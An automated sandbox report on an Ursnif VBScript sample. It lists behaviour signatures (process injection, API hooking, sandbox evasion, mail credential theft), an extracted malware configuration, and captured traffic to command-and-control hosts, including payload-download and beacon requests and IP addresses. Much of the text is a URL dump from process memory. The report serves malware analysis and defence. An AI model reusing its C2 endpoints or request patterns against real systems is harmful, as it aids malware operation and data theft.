Analysis Report 1qdMIsgkbwxA.vbs

Overview

General Information

Sample Name:	1qdMIsgkbwxA.vbs
Analysis ID:	321725
MD5:	97c7dfecae90c288dfd43c600559b5b4
SHA1:	196f7b6a4d7023337e218ab0e04bba3bcfde128a
SHA256:	698d96faec08cf39e06348e4dfa3ef631ee09fc52d4dcce16f05bc7cb240bbcc
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Found malware configuration

Multi AV Scanner detection for dropped file

Sigma detected: Dot net compiler compiles file from suspicious location

VBScript performs obfuscated calls to suspicious functions

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Creates processes via WMI

Deletes itself after installation

Disables SPDY (HTTP compression, likely to perform web injects)

Found Tor onion address

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to steal Mail credentials (via file access)

WScript reads language and country specific registry keys (likely country aware script)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Signatures

AV Detection:

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\onerous.tar

Avira: detection malicious, Label: TR/Crypt.XDR.Gen

Found malware configuration

Source: explorer.exe.3424.34.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.25", "version": "250157", "uptime": "433", "system": "c1226486b006ca8b05a07fd24752e4dd", "crc": "69afa", "action": "00000001", "id": "1100", "time": "1606144279", "user": "902d52678695dc15e71ab15c4568b2ab", "soft": "1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\onerous.tar

ReversingLabs: Detection: 50%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\onerous.tar

Joe Sandbox ML: detected

Source: C:\Windows\explorer.exe	Code function: 34_2_04DA37B8 FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,		34_2_04DA37B8
Source: C:\Windows\explorer.exe	Code function: 34_2_04DC91A0 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,		34_2_04DC91A0

Networking:

Found Tor onion address

Source: powershell.exe, 0000001B.00000003.884317497.000001A056BE0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 00000022.00000002.1105880373.0000000004DDE000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000023.00000003.894765922.000002572D2E0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 00000024.00000002.1097150279.0000027D4F83E000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000025.00000003.909700800.0000017896D10000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 47.241.19.44 47.241.19.44

Source: global traffic	HTTP traffic detected: GET /api1/DTgo8RpJRpUz/jPBspNc8N4q/ez4m7Pn85CTu8g/QncF2bBGxhwEpnOp3sWnQ/YCcVRrTVTfNVvo_2/BnzGg6v8D74iJbT/R6ALYHQcSWalUneAw_/2B_2F6rJq/6jp3H19cZYLGRK_2FFug/3tubJtVI395R_2FxfYW/WZ69RUwM35H1f1ofQVfRNo/G8RVRNPdF4859/owqzCDcU/Db_2Fhmc8hTGtEMzKz4OJY_/2B4Q5xqQu7/ZJMO_2B6aoagE_2Bc/QO1EExrZ8jMm/tydhN8XWzt_/0A_0DvbqSrbE3f/IERnih01d7bXnrt_2Fq8l/y4qvG1RaMi1LjeTh/CF6ewP_2FciP5JE/kwsV0fzM8/uh HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/lnky_2BCA00/qgKlpnuL6qqwWj/W6VQ6Sik97XOa0BNWrb0C/keiyUVxuATj3E4_2/B_2BL_2FugJJ4Da/e7_2B4XLfQlvJrZ9Le/WhpxrI8Qq/A9BYlHAq1pwRqOmJTzam/mWVelK2_2BYK1zvhvqK/fXbmIkxvhcADgSIQiDjWz8/yPKK_2B5D5OGK/5zsDFW_2/FB8d_2FomEKPNCxkvLH0E2Y/aGMQdayWN4/Np1rmkye3WmvYQxxa/_2B9MSj81d1r/vMbKOV0Oc2Z/w8Oet7rXw8d8w_/0A_0DTjqjqAs4lYaBYm_2/Bc9aaErU2YqC55qH/21nD1bQOJUIFPr2/NUHbqYXczyTGkooUru/1_2FbIo HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/zvGiN4jsuPo1Tk_2B7krB/sdD7nZv6vc3V0eQZ/SVK5a_2F5UbI1Xe/hjFW8ysW_2FwKMzhbp/dBNrgW1Sq/ingVWfO959oBdRWlxtaF/dqvh6cM4_2Bj_2BGzpY/1nsMPDa5HmfiSypu9fAPkA/Zr_2FgeOAOd0s/aUH9Lz6Q/TubYc_2FmaW911NkLBbfZgj/xoXQ4V_2Ba/lqFq_2Bsjc_2FEgzZ/D4f5RUdajhsS/uQ9Bzad_2Bl/CS5duEyCUzP_2F/EisvLe_2F7HKSMe1BjsDh/lR7UVaerv_0A_0Dw/QzSdyEHTApqz4FL/0cqIzsbCJltLoBzmuz/8uF0vLfcx/dJI_2FJPMh94aU1D9xka/4DcbwPY HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/ezlbSa0Zy7UGif8P/tV8KXcZRxzwWian/muFgYbasQRTGR9khw6/CtcuAv2MY/K_2BvzLouGkhJOOnGjVg/3_2FbHadV4up61xN5rD/cyJAvtTxlXxmhsDBesH5GT/3Nc4PQiFMjOr_/2FLSpIcc/ANNpMJl0Nc0jrQAKr3vf_2F/NyImGmvBDe/He8ZXMSaXDuB8FjkE/1wX36LjAdPHa/52mVQiR_2Bw/PJyo6IdUWSN_2B/JQHULos2nU87nT82wGT2R/5JVu85rk5fzu4sp1/_0A_0Dd8mTzto20/8bRO_2FIZoxlWWkvny/I72_2FzIa/tCr8iqoQ0xjYqh/H HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at

Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: unknown

HTTP traffic detected: POST /api1/Ppg0SH3ST3F/gucfDC73uafDmu/gxsngv0uRNgnUVK0QlHnA/X7DKkb5CZMRqAKlB/hMyibbLULRMdGzW/8aUaFmxZTQkn_2FN0N/XmgfYzKyl/ncmoRgHFL7cO3LUkPRQT/g5v0Ce65HovCMd9Lxtb/m01hA6EHX5Yso_2FMN9boY/wk_2Fij2hlpZj/sPC5Voax/EuORPnJSkBBgKdRWlcJHPqP/ZhmDzQyS5Z/3_2BTW42M24D_2FIQ/Dlj_2Bz0fn0e/_2FDhNsL1LB/juis8Ki_0A_0DL/kKdGS_2FHG_2B7hGixY1_/2FN_2FOOamFpN_2F/odmYHfyCeWNV/9ztJbtN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Nov 2020 15:09:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: explorer.exe, 00000022.00000000.913944852.000000000D9E0000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000022.00000000.915698469.000000000FD0D000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/DTgo8RpJRpUz/jPBspNc8N4q/ez4m7Pn85CTu8g/QncF2bBGxhwEpnOp3sWnQ/YCcVRrTVTf
Source: explorer.exe, 00000022.00000000.904465737.000000000A68A000.00000004.00000001.sdmp, explorer.exe, 00000022.00000000.905298980.000000000A897000.00000004.00000001.sdmp, explorer.exe, 00000022.00000000.915581599.000000000FCE0000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/lnky_2BCA00/qgKlpnuL6qqwWj/W6VQ6Sik97XOa0BNWrb0C/keiyUVxuATj3E4_2/B_2BL_
Source: explorer.exe, 00000022.00000000.915948776.000000000FD4D000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/zvGiN4jsuPo1Tk_2B7krB/sdD7nZv6vc3V0eQZ/SVK5a_2F5UbI1Xe/hjFW8ysW_2FwKMzhb
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.913944852.000000000D9E0000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: powershell.exe, 0000001B.00000003.884317497.000001A056BE0000.00000004.00000001.sdmp, explorer.exe, 00000022.00000002.1105880373.0000000004DDE000.00000004.00000001.sdmp, control.exe, 00000023.00000003.894765922.000002572D2E0000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.1097150279.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000025.00000003.909700800.0000017896D10000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 0000001B.00000003.884317497.000001A056BE0000.00000004.00000001.sdmp, explorer.exe, 00000022.00000002.1105880373.0000000004DDE000.00000004.00000001.sdmp, control.exe, 00000023.00000003.894765922.000002572D2E0000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.1097150279.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000025.00000003.909700800.0000017896D10000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 0000001B.00000003.853574867.000001A05672B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 0000001B.00000003.853574867.000001A05672B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsof
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000022.00000000.909102701.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: powershell.exe, 0000001B.00000003.884317497.000001A056BE0000.00000004.00000001.sdmp, explorer.exe, 00000022.00000002.1105880373.0000000004DDE000.00000004.00000001.sdmp, control.exe, 00000023.00000003.894765922.000002572D2E0000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.1097150279.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000025.00000003.909700800.0000017896D10000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 0000001B.00000002.930160141.000001A03E57D000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000022.00000000.914222939.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
